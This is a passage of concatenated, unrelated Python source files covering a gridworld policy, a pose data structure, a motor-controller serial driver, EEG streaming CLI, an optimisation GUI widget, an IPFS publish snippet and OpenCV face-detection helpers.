4930), False, 'import os\n'), ((5024, 5056), 'os.path.join', 'os.path.join', (['imgfolder', 'imgname'], {}), '(imgfolder, imgname)\n', (5036, 5056), False, 'import os\n'), ((5094, 5113), 'PIL.Image.open', 'Image.open', (['imgpath'], {}), '(imgpath)\n', (5104, 5113), False, 'from PIL import Image\n'), ((5159, 5184), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (5182, 5184), False, 'import torch\n'), ((5229, 5244), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (5242, 5244), False, 'import torch\n'), ((5546, 5572), 'numpy.repeat', 'np.repeat', (['pred', '(3)'], {'axis': '(2)'}), '(pred, 3, axis=2)\n', (5555, 5572), True, 'import numpy as np\n'), ((5599, 5632), 'os.path.join', 'os.path.join', (['savefolder', 'imgname'], {}), '(savefolder, imgname)\n', (5611, 5632), False, 'import os\n'), ((5645, 5674), 'cv2.imwrite', 'cv2.imwrite', (['savepath', 'pred_3'], {}), '(savepath, pred_3)\n', (5656, 5674), False, 'import cv2\n'), ((1748, 1774), 'os.path.basename', 'os.path.basename', (['snapshot'], {}), '(snapshot)\n', (1764, 1774), False, 'import os\n'), ((1924, 1943), 'torch.device', 'torch.device', (['"""cpu"""'], {}), "('cpu')\n", (1936, 1943), False, 'import torch\n'), ((5420, 5443), 'numpy.argmax', 'np.argmax', (['pred'], {'axis': '(2)'}), '(pred, axis=2)\n', (5429, 5443), True, 'import numpy as np\n')] |
from src.gridworld_mdp import GridWorld
class EquiprobableRandomPolicy:
def __init__(self):
self.world_model = GridWorld()
def get_prob(self, selected_action, state):
assert state in self.world_model.states
assert selected_action in self.world_model.actions
num_all_possible_actions = 0
times_selected_action_chosen = 0
for next_state in self.world_model.states:
for action in self.world_model.actions:
if self.world_model.reward_fn(state, action, next_state) == -1:
num_all_possible_actions += 1
if action == selected_action:
times_selected_action_chosen += 1
if not num_all_possible_actions:
return 0
prob = times_selected_action_chosen / num_all_possible_actions
return prob
| [
"src.gridworld_mdp.GridWorld"
]
| [((125, 136), 'src.gridworld_mdp.GridWorld', 'GridWorld', ([], {}), '()\n', (134, 136), False, 'from src.gridworld_mdp import GridWorld\n')] |
import logging
from collections import namedtuple
logger = logging.getLogger("pybinsim.Pose")
class Orientation(namedtuple('Orientation', ['yaw', 'pitch', 'roll'])):
pass
class Position(namedtuple('Position', ['x', 'y', 'z'])):
pass
class Custom(namedtuple('CustomValues', ['a', 'b', 'c'])):
pass
class Pose:
def __init__(self, orientation, position, custom=Custom(0, 0, 0)):
self.orientation = orientation
self.position = position
self.custom = custom
def create_key(self):
value_list = list(self.orientation) + list(self.position) + list(self.custom)
return ','.join([str(x) for x in value_list])
@staticmethod
def from_filterValueList(filter_value_list):
# 'old' format: orientation - position
if len(filter_value_list) == 6:
orientation = Orientation(filter_value_list[0], filter_value_list[1], filter_value_list[2])
position = Position(filter_value_list[3], filter_value_list[4], filter_value_list[5])
return Pose(orientation, position)
# 'new' format: orientation - position - custom
if len(filter_value_list) == 9:
orientation = Orientation(filter_value_list[0], filter_value_list[1], filter_value_list[2])
position = Position(filter_value_list[3], filter_value_list[4], filter_value_list[5])
custom = Custom(filter_value_list[6], filter_value_list[7], filter_value_list[8])
return Pose(orientation, position, custom)
raise RuntimeError("Unable to parse filter list: {}".format(filter_value_list))
| [
"logging.getLogger",
"collections.namedtuple"
]
| [((60, 94), 'logging.getLogger', 'logging.getLogger', (['"""pybinsim.Pose"""'], {}), "('pybinsim.Pose')\n", (77, 94), False, 'import logging\n'), ((115, 166), 'collections.namedtuple', 'namedtuple', (['"""Orientation"""', "['yaw', 'pitch', 'roll']"], {}), "('Orientation', ['yaw', 'pitch', 'roll'])\n", (125, 166), False, 'from collections import namedtuple\n'), ((195, 234), 'collections.namedtuple', 'namedtuple', (['"""Position"""', "['x', 'y', 'z']"], {}), "('Position', ['x', 'y', 'z'])\n", (205, 234), False, 'from collections import namedtuple\n'), ((261, 304), 'collections.namedtuple', 'namedtuple', (['"""CustomValues"""', "['a', 'b', 'c']"], {}), "('CustomValues', ['a', 'b', 'c'])\n", (271, 304), False, 'from collections import namedtuple\n')] |
from __future__ import print_function
"""
Low-level serial communication for Trinamic TMCM-140-42-SE controller
(used internally for the Thorlabs MFC1)
"""
import serial, struct, time, collections
try:
# this is nicer because it provides deadlock debugging information
from acq4.util.Mutex import RecursiveMutex as RLock
except ImportError:
from threading import RLock
try:
from ..SerialDevice import SerialDevice, TimeoutError, DataError
except ValueError:
## relative imports not allowed when running from command prompt, so
## we adjust sys.path when running the script for testing
if __name__ == '__main__':
import sys, os
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))
from SerialDevice import SerialDevice, TimeoutError, DataError
def threadsafe(method):
# decorator for automatic mutex lock/unlock
def lockMutex(self, *args, **kwds):
with self.lock:
return method(self, *args, **kwds)
return lockMutex
COMMANDS = {
'rol': 2,
'ror': 1,
'mvp': 4,
'mst': 3,
'rfs': 13,
'sco': 30,
'cco': 32,
'gco': 31,
'sap': 5,
'gap': 6,
'stap': 7,
'rsap': 8,
'sgp': 9,
'ggp': 10,
'stgp': 11,
'rsgp': 12,
'sio': 14,
'gio': 15,
'calc': 19,
'comp': 20,
'jc': 21,
'ja': 22,
'csub': 23,
'rsub': 24,
'wait': 27,
'stop': 28,
'sco': 30,
'gco': 31,
'cco': 32,
'calcx': 33,
'aap': 34,
'agp': 35,
'aco': 39,
'sac': 29,
'stop_application': 128,
'run_application': 129,
'step_application': 130,
'reset_application': 131,
'start_download': 132,
'stop_download': 133,
'get_application_status': 135,
'get_firmware_version': 136,
'restore_factory_settings': 137,
}
PARAMETERS = { # negative values indicate read-only parameters
'target_position': 0,
'actual_position': 1,
'target_speed': 2,
'actual_speed': 3,
'maximum_speed': 4,
'maximum_acceleration': 5,
'maximum_current': 6,
'standby_current': 7,
'target_pos_reached': 8,
'ref_switch_status': 9,
'right_limit_switch_status': 10,
'left_limit_switch_status': 11,
'right_limit_switch_disable': 12,
'left_limit_switch_disable': 13,
'minimum_speed': -130,
'acceleration': -135,
'ramp_mode': 138,
'microstep_resolution': 140,
'soft_stop_flag': 149,
'ramp_divisor': 153,
'pulse_divisor': 154,
'referencing_mode': 193,
'referencing_search_speed': 194,
'referencing_switch_speed': 195,
'distance_end_switches': 196,
'mixed_decay_threshold': 203,
'freewheeling': 204,
'stall_detection_threshold': 205,
'actual_load_value': 206,
'driver_error_flags': -208,
'encoder_position': 209,
'encoder_prescaler': 210,
'fullstep_threshold': 211,
'maximum_encoder_deviation': 212,
'power_down_delay': 214,
'absolute_encoder_value': -215,
}
GLOBAL_PARAMETERS = {
'eeprom_magic': 64,
'baud_rate': 65,
'serial_address': 66,
'ascii_mode': 67,
'eeprom_lock': 73,
'auto_start_mode': 77,
'tmcl_code_protection': 81,
'coordinate_storage': 84,
'tmcl_application_status': 128,
'download_mode': 129,
'tmcl_program_counter': 130,
'tick_timer': 132,
'random_number': -133,
}
OPERATORS = {
'add': 0,
'sub': 1,
'mul': 2,
'div': 3,
'mod': 4,
'and': 5,
'or': 6,
'xor': 7,
'not': 8,
'load': 9,
'swap': 10,
}
CONDITIONS = {
'ze': 0,
'nz': 1,
'eq': 2,
'ne': 3,
'gt': 4,
'ge': 5,
'lt': 6,
'le': 7,
'eto': 8,
'eal': 9,
'esd': 12,
}
STATUS = {
1: "Wrong checksum",
2: "Invalid command",
3: "Wrong type",
4: "Invalid value",
5: "Configuration EEPROM locked",
6: "Command not available",
}
class TMCMError(Exception):
def __init__(self, status):
self.status = status
msg = STATUS[status]
Exception.__init__(self, msg)
class TMCM140(SerialDevice):
def __init__(self, port, baudrate=9600, module_addr=1):
"""
port: serial COM port (eg. COM3 or /dev/ttyACM0)
baudrate: 9600 by default
module_addr: 1 by default
"""
self.lock = RLock(debug=True)
self.port = port
assert isinstance(module_addr, int)
assert module_addr > 0
self.module_addr = module_addr
self.module_str = chr(module_addr+64)
self._waiting_for_reply = False
SerialDevice.__init__(self, port=self.port, baudrate=baudrate)
@threadsafe
def command(self, cmd, type, motor, value):
"""Send a command to the controller and return the reply.
If an error is returned from the controller then raise an exception.
"""
self._send_cmd(cmd, type, motor, value)
return self._get_reply()
def rotate(self, velocity):
"""Begin rotating motor.
velocity: -2047 to +2047
negative values turn left; positive values turn right.
"""
assert isinstance(velocity, int)
assert -2047 <= velocity <= 2047
if velocity < 0:
direction = 'l'
velocity = -velocity
else:
direction = 'r'
self.command('ro'+direction, 0, 0, velocity)
def stop(self):
"""Stop the motor.
Note: does not stop currently running programs.
"""
self.command('mst', 0, 0, 0)
def move(self, pos, relative=False, velocity=None):
"""Rotate until reaching *pos*.
pos: The target position
relative: If True, then *pos* is interpreted as relative to the current
position
velocity: Optionally set the target velocity before moving
"""
assert isinstance(pos, int)
assert -2**32 <= pos < 2**32
if velocity is not None:
assert isinstance(velocity, int)
assert 0 <= velocity < 2048
raise NotImplementedError()
type = 1 if relative else 0
self.command('mvp', type, 0, pos)
def get_param(self, param):
pnum = abs(PARAMETERS[param])
return self.command('gap', pnum, 0, 0)[4]
def __getitem__(self, param):
return self.get_param(param)
def set_param(self, param, value, **kwds):
"""Set a parameter value.
If valus is 'accum' then the parameter is set from the accumulator
register.
"""
pnum = PARAMETERS[param]
if pnum < 0:
raise TypeError("Parameter %s is read-only." % param)
if pnum in (PARAMETERS['maximum_current'], PARAMETERS['standby_current']) and value > 100:
if kwds.get('force', False) is not True:
raise Exception("Refusing to set current > 100 (this can damage the motor). "
"To override, use force=True.")
if value == 'accum':
self.command('aap', pnum, 0, 0)
else:
self.command('sap', pnum, 0, value)
@threadsafe
def set_params(self, **kwds):
"""Set multiple parameters.
The driver is thread-locked until all parameters are set.
"""
for param, value in kwds.items():
self.set_param(param, value)
def __setitem__(self, param, value):
return self.set_param(param, value)
def get_global(self, param):
"""Return a global parameter or copy global to accumulator.
Use param='gpX' to refer to general-purpose variables.
"""
if param.startswith('gp'):
pnum = int(param[2:])
bank = 2
else:
pnum = abs(GLOBAL_PARAMETERS[param])
bank = 0
return self.command('ggp', pnum, bank, 0)[4]
def set_global(self, param, value):
if param.startswith('gp'):
pnum = int(param[2:])
bank = 2
else:
pnum = GLOBAL_PARAMETERS[param]
bank = 0
if pnum < 0:
raise TypeError("Parameter %s is read-only." % param)
if value == 'accum':
self.command('agp', pnum, bank, 0)
else:
self.command('sgp', pnum, bank, value)
def stop_program(self):
"""Stop the currently running TMCL program.
"""
self.command('stop_application', 0, 0, 0)
def start_program(self, address=None):
"""Start running TMCL program code from the given address (in bytes?),
or from the current address if None.
"""
if address is None:
self.command('run_application', 0, 0, 0)
else:
self.command('run_application', 1, 0, address)
def start_download(self, address=0):
"""Begin loading TMCL commands into EEPROM .
"""
self.command('start_download', 0, 0, address)
def stop_download(self):
"""Finish loading TMCL commands into EEPROM.
"""
self.command('stop_download', 0, 0, 0)
def write_program(self, address=0):
return ProgramManager(self, address)
def program_status(self):
"""Return current program status:
0=stop, 1=run, 2=step, 3=reset
"""
return self.command('get_application_status', 0, 0, 0)[4]
def calc(self, op, value):
opnum = OPERATORS[op]
if opnum > 9:
raise TypeError("Operator %s invalid for calc" % op)
self.command('calc', opnum, 0, value)
def calcx(self, op):
opnum = OPERATORS[op]
self.command('calcx', opnum, 0, 0)
def comp(self, val):
self.command('comp', 0, 0, val)
def jump(self, *args):
"""Program jump to *addr* (instruction index).
Usage:
jump(address)
jump(cond, address)
Where *cond* may be ze, nz, eq, ne, gt, ge, lt, le, eto, eal, or esd.
"""
if len(args) == 1:
assert isinstance(args[0], int)
self.command('ja', 0, 0, args[0])
else:
cnum = CONDITIONS[args[0]]
self.command('jc', cnum, 0, args[1])
def _send_cmd(self, cmd, type, motor, value):
"""Send a command to the controller.
"""
if self._waiting_for_reply:
raise Exception("Cannot send command; previous reply has not been "
"received yet.")
cmd_num = COMMANDS[cmd]
assert isinstance(type, int)
assert isinstance(motor, int)
# Try packing the value first as unsigned, then signed. (the overlapping
# integer ranges have identical bit representation, so there is no
# ambiguity)
try:
cmd = struct.pack('>BBBBI', self.module_addr, cmd_num, type, motor, value)
except struct.error:
cmd = struct.pack('>BBBBi', self.module_addr, cmd_num, type, motor, value)
chksum = sum(bytearray(cmd)) % 256
out = cmd + struct.pack('B', chksum)
self.write(out)
self._waiting_for_reply = True
def _get_reply(self):
"""Read and parse a reply from the controller.
Raise an exception if an error was reported.
"""
if not self._waiting_for_reply:
raise Exception("No reply expected.")
try:
d = self.read(9)
finally:
self._waiting_for_reply = False
d2 = self.readAll()
if len(d2) > 0:
raise Exception("Error: extra data while reading reply.")
parts = struct.unpack('>BBBBiB', d)
reply_addr, module_addr, status, cmd_num, value, chksum = parts
if chksum != sum(bytearray(d[:-1])) % 256:
raise Exception("Invalid checksum reading from controller.")
if status < 100:
raise TMCMError(status)
return parts
class ProgramManager(object):
def __init__(self, mcm, start=0):
self.mcm = mcm
self.start = start
self.count = 0
def __enter__(self):
self.mcm.lock.acquire()
self.mcm.start_download(self.start)
return self
def __exit__(self, *args):
# insert an extra stop to ensure the program can't leak
# into previously written code.
self.mcm.command('stop', 0, 0, 0)
self.mcm.stop_download()
self.mcm.lock.release()
def __getattr__(self, name):
self.count += 1
return getattr(self.mcm, name)
| [
"threading.RLock",
"struct.pack",
"os.path.dirname",
"struct.unpack",
"SerialDevice.SerialDevice.__init__"
]
| [((4354, 4371), 'threading.RLock', 'RLock', ([], {'debug': '(True)'}), '(debug=True)\n', (4359, 4371), False, 'from threading import RLock\n'), ((4605, 4667), 'SerialDevice.SerialDevice.__init__', 'SerialDevice.__init__', (['self'], {'port': 'self.port', 'baudrate': 'baudrate'}), '(self, port=self.port, baudrate=baudrate)\n', (4626, 4667), False, 'from SerialDevice import SerialDevice, TimeoutError, DataError\n'), ((11907, 11934), 'struct.unpack', 'struct.unpack', (['""">BBBBiB"""', 'd'], {}), "('>BBBBiB', d)\n", (11920, 11934), False, 'import serial, struct, time, collections\n'), ((11044, 11112), 'struct.pack', 'struct.pack', (['""">BBBBI"""', 'self.module_addr', 'cmd_num', 'type', 'motor', 'value'], {}), "('>BBBBI', self.module_addr, cmd_num, type, motor, value)\n", (11055, 11112), False, 'import serial, struct, time, collections\n'), ((11305, 11329), 'struct.pack', 'struct.pack', (['"""B"""', 'chksum'], {}), "('B', chksum)\n", (11316, 11329), False, 'import serial, struct, time, collections\n'), ((11160, 11228), 'struct.pack', 'struct.pack', (['""">BBBBi"""', 'self.module_addr', 'cmd_num', 'type', 'motor', 'value'], {}), "('>BBBBi', self.module_addr, cmd_num, type, motor, value)\n", (11171, 11228), False, 'import serial, struct, time, collections\n'), ((720, 745), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (735, 745), False, 'import sys, os\n')] |
import unittest
from signals.generators.ios.core_data import get_current_version, get_core_data_from_folder
class CoreDataTestCase(unittest.TestCase):
def test_get_current_version(self):
version_name = get_current_version('./tests/files/doubledummy.xcdatamodeld')
self.assertEqual(version_name, 'dummy 2.xcdatamodel')
version_name = get_current_version('./tests/files/dummy.xcdatamodeld')
self.assertEqual(version_name, 'dummy.xcdatamodel')
def test_get_core_data_from_folder(self):
xcdatamodeld_path = './tests/files/doubledummy.xcdatamodeld'
contents_path = xcdatamodeld_path + '/dummy 2.xcdatamodel/contents'
self.assertEqual(get_core_data_from_folder(xcdatamodeld_path), contents_path)
xcdatamodeld_path = './tests/files/dummy.xcdatamodeld'
contents_path = xcdatamodeld_path + '/dummy.xcdatamodel/contents'
self.assertEqual(get_core_data_from_folder(xcdatamodeld_path), contents_path)
| [
"signals.generators.ios.core_data.get_current_version",
"signals.generators.ios.core_data.get_core_data_from_folder"
]
| [((216, 277), 'signals.generators.ios.core_data.get_current_version', 'get_current_version', (['"""./tests/files/doubledummy.xcdatamodeld"""'], {}), "('./tests/files/doubledummy.xcdatamodeld')\n", (235, 277), False, 'from signals.generators.ios.core_data import get_current_version, get_core_data_from_folder\n'), ((363, 418), 'signals.generators.ios.core_data.get_current_version', 'get_current_version', (['"""./tests/files/dummy.xcdatamodeld"""'], {}), "('./tests/files/dummy.xcdatamodeld')\n", (382, 418), False, 'from signals.generators.ios.core_data import get_current_version, get_core_data_from_folder\n'), ((696, 740), 'signals.generators.ios.core_data.get_core_data_from_folder', 'get_core_data_from_folder', (['xcdatamodeld_path'], {}), '(xcdatamodeld_path)\n', (721, 740), False, 'from signals.generators.ios.core_data import get_current_version, get_core_data_from_folder\n'), ((920, 964), 'signals.generators.ios.core_data.get_core_data_from_folder', 'get_core_data_from_folder', (['xcdatamodeld_path'], {}), '(xcdatamodeld_path)\n', (945, 964), False, 'from signals.generators.ios.core_data import get_current_version, get_core_data_from_folder\n')] |
#!/usr/bin/python
import sys
import argparse
class main:
def __init__(self):
parser = argparse.ArgumentParser(
description='Python package for streaming, recording, and visualizing EEG data from the Muse 2016 headset.',
usage='''muselsl <command> [<args>]
Available commands:
list List available Muse devices.
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
stream Start an LSL stream from Muse headset.
-a --address Device MAC address.
-n --name Device name (e.g. Muse-41D2).
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
view Visualize EEG data from an LSL stream.
-w --window Window length to display in seconds.
-s --scale Scale in uV.
-r --refresh Refresh rate in seconds.
-f --figure Window size.
-v --version Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).
record Record EEG data from an LSL stream.
-d --duration Duration of the recording in seconds.
-f --filename Name of the recording file.
-dj --dejitter Whether to apply dejitter correction to timestamps.
record_direct Record data directly from Muse headset (no LSL).
-a --address Device MAC address.
-n --name Device name (e.g. Muse-41D2).
-b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.
-i --interface The interface to use, 'hci0' for gatt or a com port for bgapi.
''')
parser.add_argument('command', help='Command to run.')
# parse_args defaults to [1:] for args, but you need to
# exclude the rest of the args too, or validation will fail
args = parser.parse_args(sys.argv[1:2])
if not hasattr(self, args.command):
print('Incorrect usage. See help below.')
parser.print_help()
exit(1)
# use dispatch pattern to invoke method with same name
getattr(self, args.command)()
def list(self):
parser = argparse.ArgumentParser(
description='List available Muse devices.')
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import list_muses
list_muses(args.backend, args.interface)
def stream(self):
parser = argparse.ArgumentParser(
description='Start an LSL stream from Muse headset.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
args = parser.parse_args(sys.argv[2:])
from . import stream
stream(args.address, args.backend,
args.interface, args.name)
def record(self):
parser = argparse.ArgumentParser(
description='Record data from an LSL stream.')
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
parser.add_argument("-dj", "--dejitter",
dest="dejitter", type=bool, default=True,
help="Whether to apply dejitter correction to timestamps.")
args = parser.parse_args(sys.argv[2:])
from . import record
record(args.duration, args.filename, args.dejitter)
def record_direct(self):
parser = argparse.ArgumentParser(
description='Record directly from Muse without LSL.')
parser.add_argument("-a", "--address",
dest="address", type=str, default=None,
help="Device MAC address.")
parser.add_argument("-n", "--name",
dest="name", type=str, default=None,
help="Name of the device.")
parser.add_argument("-b", "--backend",
dest="backend", type=str, default="auto",
help="BLE backend to use. Can be auto, bluemuse, gatt or bgapi.")
parser.add_argument("-i", "--interface",
dest="interface", type=str, default=None,
help="The interface to use, 'hci0' for gatt or a com port for bgapi.")
parser.add_argument("-d", "--duration",
dest="duration", type=int, default=60,
help="Duration of the recording in seconds.")
parser.add_argument("-f", "--filename",
dest="filename", type=str, default=None,
help="Name of the recording file.")
args = parser.parse_args(sys.argv[2:])
from . import record_direct
record_direct(args.address, args.backend,
args.interface, args.name, args.duration, args.filename)
def view(self):
parser = argparse.ArgumentParser(
description='View EEG data from an LSL stream.')
parser.add_argument("-w", "--window",
dest="window", type=float, default=5.,
help="Window length to display in seconds.")
parser.add_argument("-s", "--scale",
dest="scale", type=float, default=100,
help="Scale in uV.")
parser.add_argument("-r", "--refresh",
dest="refresh", type=float, default=0.2,
help="Refresh rate in seconds.")
parser.add_argument("-f", "--figure",
dest="figure", type=str, default="15x6",
help="Window size.")
parser.add_argument("-v", "--version",
dest="version", type=int, default=1,
help="Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).")
args = parser.parse_args(sys.argv[2:])
from . import view
view(args.window, args.scale, args.refresh, args.figure, args.version)
| [
"argparse.ArgumentParser"
]
| [((98, 1950), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Python package for streaming, recording, and visualizing EEG data from the Muse 2016 headset."""', 'usage': '"""muselsl <command> [<args>]\n Available commands:\n list List available Muse devices.\n -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.\n -i --interface The interface to use, \'hci0\' for gatt or a com port for bgapi.\n\n stream Start an LSL stream from Muse headset.\n -a --address Device MAC address.\n -n --name Device name (e.g. Muse-41D2).\n -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.\n -i --interface The interface to use, \'hci0\' for gatt or a com port for bgapi.\n\n view Visualize EEG data from an LSL stream.\n -w --window Window length to display in seconds.\n -s --scale Scale in uV.\n -r --refresh Refresh rate in seconds.\n -f --figure Window size.\n -v --version Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).\n\n record Record EEG data from an LSL stream.\n -d --duration Duration of the recording in seconds.\n -f --filename Name of the recording file.\n -dj --dejitter Whether to apply dejitter correction to timestamps.\n\n record_direct Record data directly from Muse headset (no LSL).\n -a --address Device MAC address.\n -n --name Device name (e.g. Muse-41D2).\n -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.\n -i --interface The interface to use, \'hci0\' for gatt or a com port for bgapi.\n """'}), '(description=\n \'Python package for streaming, recording, and visualizing EEG data from the Muse 2016 headset.\'\n , usage=\n """muselsl <command> [<args>]\n Available commands:\n list List available Muse devices.\n -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.\n -i --interface The interface to use, \'hci0\' for gatt or a com port for bgapi.\n\n stream Start an LSL stream from Muse headset.\n -a --address Device MAC address.\n -n --name Device name (e.g. Muse-41D2).\n -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.\n -i --interface The interface to use, \'hci0\' for gatt or a com port for bgapi.\n\n view Visualize EEG data from an LSL stream.\n -w --window Window length to display in seconds.\n -s --scale Scale in uV.\n -r --refresh Refresh rate in seconds.\n -f --figure Window size.\n -v --version Viewer version (1 or 2) - 1 is the default stable version, 2 is in development (and takes no arguments).\n\n record Record EEG data from an LSL stream.\n -d --duration Duration of the recording in seconds.\n -f --filename Name of the recording file.\n -dj --dejitter Whether to apply dejitter correction to timestamps.\n\n record_direct Record data directly from Muse headset (no LSL).\n -a --address Device MAC address.\n -n --name Device name (e.g. Muse-41D2).\n -b --backend BLE backend to use. can be auto, bluemuse, gatt or bgapi.\n -i --interface The interface to use, \'hci0\' for gatt or a com port for bgapi.\n """\n )\n', (121, 1950), False, 'import argparse\n'), ((2491, 2558), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""List available Muse devices."""'}), "(description='List available Muse devices.')\n", (2514, 2558), False, 'import argparse\n'), ((3170, 3247), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Start an LSL stream from Muse headset."""'}), "(description='Start an LSL stream from Muse headset.')\n", (3193, 3247), False, 'import argparse\n'), ((4227, 4297), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Record data from an LSL stream."""'}), "(description='Record data from an LSL stream.')\n", (4250, 4297), False, 'import argparse\n'), ((5071, 5148), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Record directly from Muse without LSL."""'}), "(description='Record directly from Muse without LSL.')\n", (5094, 5148), False, 'import argparse\n'), ((6547, 6619), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""View EEG data from an LSL stream."""'}), "(description='View EEG data from an LSL stream.')\n", (6570, 6619), False, 'import argparse\n')] |
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# Copyright 2021- QuOCS Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
from qtpy import QtWidgets
from quocspyside2interface.gui.uiclasses.GeneralSettingsNMUI import Ui_Form
from quocspyside2interface.gui.freegradients.StoppingCriteriaNM import StoppingCriteriaNM
from quocspyside2interface.logic.OptimalAlgorithmDictionaries.NelderMeadDictionary import NelderMeadDictionary
class GeneralSettingsNM(QtWidgets.QWidget, Ui_Form):
def __init__(self, loaded_dictionary=None):
super().__init__()
self.setupUi(self)
nm_dictionary, stopping_criteria_dictionary = None, None
if loaded_dictionary is not None:
nm_dictionary = loaded_dictionary["general_settings"]
stopping_criteria_dictionary = loaded_dictionary["stopping_criteria"]
# Nelder Mead Dictionary
self.nelder_mead_dictionary = NelderMeadDictionary(loaded_dictionary=nm_dictionary)
# Create widget
self.stopping_criteria_form = StoppingCriteriaNM(loaded_dictionary=stopping_criteria_dictionary)
# Connection
self.is_adaptive_checkbox.stateChanged.connect(self.set_is_adaptive)
self._initialization()
def _initialization(self):
self.is_adaptive_checkbox.setChecked(self.nelder_mead_dictionary.is_adaptive)
self.stopping_criteria_scroll_area.setWidget(self.stopping_criteria_form)
def set_is_adaptive(self):
self.nelder_mead_dictionary.is_adaptive = self.is_adaptive_checkbox.isChecked()
def get_dictionary(self):
return {"dsm_settings": {"general_settings": self.nelder_mead_dictionary.get_dictionary(),
"stopping_criteria": self.stopping_criteria_form.get_dictionary()}} | [
"quocspyside2interface.gui.freegradients.StoppingCriteriaNM.StoppingCriteriaNM",
"quocspyside2interface.logic.OptimalAlgorithmDictionaries.NelderMeadDictionary.NelderMeadDictionary"
]
| [((1557, 1610), 'quocspyside2interface.logic.OptimalAlgorithmDictionaries.NelderMeadDictionary.NelderMeadDictionary', 'NelderMeadDictionary', ([], {'loaded_dictionary': 'nm_dictionary'}), '(loaded_dictionary=nm_dictionary)\n', (1577, 1610), False, 'from quocspyside2interface.logic.OptimalAlgorithmDictionaries.NelderMeadDictionary import NelderMeadDictionary\n'), ((1673, 1739), 'quocspyside2interface.gui.freegradients.StoppingCriteriaNM.StoppingCriteriaNM', 'StoppingCriteriaNM', ([], {'loaded_dictionary': 'stopping_criteria_dictionary'}), '(loaded_dictionary=stopping_criteria_dictionary)\n', (1691, 1739), False, 'from quocspyside2interface.gui.freegradients.StoppingCriteriaNM import StoppingCriteriaNM\n')] |
import ipfsapi
c = ipfsapi.connect()
peer_id = c.key_list()['Keys'][1]['Id']
c.name_publish('QmYjYGKXqo36GDt6f6qvp9qKAsrc72R9y88mQSLvogu8Ub', key='another_key')
result = c.cat('/ipns/' + peer_id)
print(result)
| [
"ipfsapi.connect"
]
| [((21, 38), 'ipfsapi.connect', 'ipfsapi.connect', ([], {}), '()\n', (36, 38), False, 'import ipfsapi\n')] |
import cv2
import os
import numpy as np
# This module contains all common functions that are called in tester.py file
# Given an image below function returns rectangle for face detected alongwith gray scale image
def faceDetection(test_img):
gray_img = cv2.cvtColor(test_img, cv2.COLOR_BGR2GRAY) # convert color image to grayscale
face_haar_cascade = cv2.CascadeClassifier('HaarCascade/haarcascade_frontalface_default.xml') # Load haar classifier
faces = face_haar_cascade.detectMultiScale(gray_img, scaleFactor=1.32,
minNeighbors=5) # detectMultiScale returns rectangles
return faces, gray_img
# Given a directory below function returns part of gray_img which is face alongwith its label/ID
def labels_for_training_data(directory):
faces = []
faceID = []
for path, subdirnames, filenames in os.walk(directory):
for filename in filenames:
if filename.startswith("."):
print("Skipping system file") # Skipping files that startwith .
continue
id = os.path.basename(path) # fetching subdirectory names
img_path = os.path.join(path, filename) # fetching image path
print("img_path:", img_path)
print("id:", id)
test_img = cv2.imread(img_path) # loading each image one by one
if test_img is None:
print("Image not loaded properly")
continue
faces_rect, gray_img = faceDetection(
test_img) # Calling faceDetection function to return faces detected in particular image
if len(faces_rect) != 1:
continue # Since we are assuming only single person images are being fed to classifier
(x, y, w, h) = faces_rect[0]
roi_gray = gray_img[y:y + w, x:x + h] # cropping region of interest i.e. face area from grayscale image
faces.append(roi_gray)
faceID.append(int(id))
return faces, faceID
# Below function trains haar classifier and takes faces,faceID returned by previous function as its arguments
def train_classifier(faces, faceID):
face_recognizer = cv2.face.LBPHFaceRecognizer_create()
face_recognizer.train(faces, np.array(faceID))
return face_recognizer
# Below function draws bounding boxes around detected face in image
def draw_rect(test_img, face):
(x, y, w, h) = face
